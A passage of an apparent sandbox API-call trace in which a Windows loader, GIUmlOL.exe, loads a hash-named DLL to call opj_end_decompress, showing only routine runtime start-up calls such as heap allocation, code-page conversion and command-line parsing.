0x7ffc5bfe3780 [0216.142] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0216.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3c8) returned 0x43c200 [0216.142] SetLastError (dwErrCode=0x7e) [0216.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1200) returned 0x443b10 [0216.144] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0216.144] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0216.144] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0216.144] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0216.144] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_end_decompress" [0216.144] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_end_decompress" [0216.144] GetACP () returned 0x4e4 [0216.144] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x228) returned 0x434f20 [0216.144] IsValidCodePage (CodePage=0x4e4) returned 1 [0216.145] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0216.145] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0216.145] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0216.145] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0216.145] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0216.145] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0216.145] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0216.145] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0216.145] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0216.145] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0216.145] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0216.145] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0216.145] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0216.145] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0216.145] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0216.145] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0216.146] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0216.146] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x100) returned 0x441ca0 [0216.146] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0216.146] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x178) returned 0x439640 [0216.146] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0216.146] GetLastError () returned 0x0 [0216.146] SetLastError (dwErrCode=0x0) [0216.146] GetEnvironmentStringsW () returned 0x444d20* [0216.146] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9cc) returned 0x445700 [0216.146] FreeEnvironmentStringsW (penv=0x444d20) returned 1 [0216.146] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x118) returned 0x439b90 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3e) returned 0x440fe0 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x5c) returned 0x430780 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x62) returned 0x4347a0 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x78) returned 0x4355e0 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x62) returned 0x434510 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x28) returned 0x43b040 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x48) returned 0x440b30 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1a) returned 0x43b1c0 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3a) returned 0x440950 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x62) returned 0x434000 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2a) returned 0x43e3c0 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2e) returned 0x43e340 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1c) returned 0x43b430 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xd2) returned 0x435870 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x7c) returned 0x433c20 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3a) returned 0x440a90 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x90) returned 0x4320d0 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x24) returned 0x43b130 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x30) returned 0x43e180 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x36) returned 0x43e440 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3c) returned 0x441260 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x52) returned 0x438e60 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3c) returned 0x440630 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xd6) returned 0x4351b0 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2e) returned 0x43e1c0 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1e) returned 0x43afe0 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2c) returned 0x43e080 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x54) returned 0x438ce0 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x52) returned 0x438da0 [0216.147] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x24) returned 0x43b070 [0216.148] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x42) returned 0x440f40 [0216.148] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2c) returned 0x43e780 [0216.148] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x44) returned 0x440810 [0216.148] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x24) returned 0x43b490 [0216.148] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x445700 | out: hHeap=0x430000) returned 1 [0216.148] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1000) returned 0x444d20 [0216.148] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0216.148] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0216.148] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_end_decompress" [0216.149] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_end_decompress", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x43c5d0*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0216.149] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0216.157] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0216.157] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0216.157] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0216.157] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0216.157] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0216.158] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0216.158] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0216.158] GetProcessHeap () returned 0x430000 [0216.158] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0216.158] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0216.158] GetLastError () returned 0x0 [0216.159] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0216.159] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0216.159] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3c8) returned 0x4461b0 [0216.159] SetLastError (dwErrCode=0x0) [0216.159] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1200) returned 0x446580 [0216.160] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0216.160] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0216.160] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0216.161] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0216.161] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_end_decompress" [0216.161] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_end_decompress" [0216.641] GetACP () returned 0x4e4 [0216.641] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x228) returned 0x434290 [0216.641] IsValidCodePage (CodePage=0x4e4) returned 1 [0216.641] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0216.641] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0216.642] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0216.642] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0216.642] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" 